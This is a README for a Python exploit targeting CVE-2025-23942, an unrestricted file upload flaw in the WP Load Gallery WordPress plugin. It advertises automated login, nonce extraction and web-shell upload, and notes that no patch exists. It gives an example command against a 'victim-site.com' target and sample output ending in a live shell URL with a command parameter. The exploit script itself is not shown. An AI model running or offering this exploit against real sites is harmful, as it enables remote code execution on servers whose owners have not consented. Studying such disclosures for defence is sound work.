# WP Load Gallery Exploit (CVE-2025-23942)

## 📌 Description
Unrestricted Upload of File with Dangerous Type vulnerability in NgocCode WP Load Gallery allows Upload a Web Shell to a Web Server. This issue affects WP Load Gallery: from n/a through 2.1.6.

## ⚠️ Vulnerability Details
- **CVE ID:** CVE-2025-23942
- **Affected Plugin:** WP Load Gallery
- **Affected Versions:** Up to **2.1.6**
- **Vulnerability Type:** **Unrestricted File Upload**
- **Severity:** **Critical (9.1 CVSS)**
- **Attack Vector:** **Authenticated (Author+) Remote Code Execution (RCE)**
- **Patch Available:** ❌ (No official patch yet)

## 🚀 Features of the Exploit
✅ **Automated Exploitation** – Extracts nonce, logs in, and uploads the shell automatically.  
✅ **Version Check** – Confirms if the target is vulnerable before exploitation.  
✅ **Error Handling** – Ensures smooth execution even in case of failures.  
✅ **Session Handling** – Uses persistent session management for authentication.  
✅ **Real-time Feedback** – Provides output at each step.

## 🛠️ Requirements
- Python 3.x
- `requests` module (`pip install requests`)
- A valid **WordPress Author+ account** on the target system

## 🔥 Usage
Run the script with the necessary parameters:
```bash
usage: CVE-2025-23942.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit WP Load Gallery - Arbitrary File Upload

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., https://example.com)
  -un USERNAME, --username USERNAME
                        WordPress Username
  -p PASSWORD, --password PASSWORD
                        WordPress Password
```
Example:
```bash
python CVE-2025-23942.py -u http://victim-site.com -un author_user -p password123
```

## 📝 Output Example
```
   _______      ________    ___   ___ ___  _____     ___  ____   ___  _  _ ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|   |__ \|___ \ / _ \| || |__ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______ ) | __) | (_) | || |_ ) |
 | |      \ \/ / |  __|______/ /| | | |/ /|___ \______/ / |__ < \__, |__   _/ / 
 | |____   \  /  | |____    / /_| |_| / /_ ___) |    / /_ ___) |  / /   | |/ /_ 
  \_____|   \/   |______|  |____|\___/____|____/    |____|____/  /_/    |_|____|

[+] Checking plugin version...
[+] Detected version: 2.1.6
[+] The target is vulnerable! Proceeding with exploitation...
[+] Logged in successfully.
[+] Extracting wplg_nonce...
[+] Extracted wplg_nonce: a1b2c3d4e5
[+] Uploading shell...
[+] File uploaded successfully!
[+] Shell is accessible at: http://victim-site.com/wp-content/uploads/2025/02/nxploit.php?cmd=id
```

## 📜 Legal Disclaimer
This exploit is intended for **educational and security research purposes only**. Do not use it on systems you do not own or have explicit permission to test. The author is **not responsible** for any misuse of this script. 
( Khaled_alenazi )






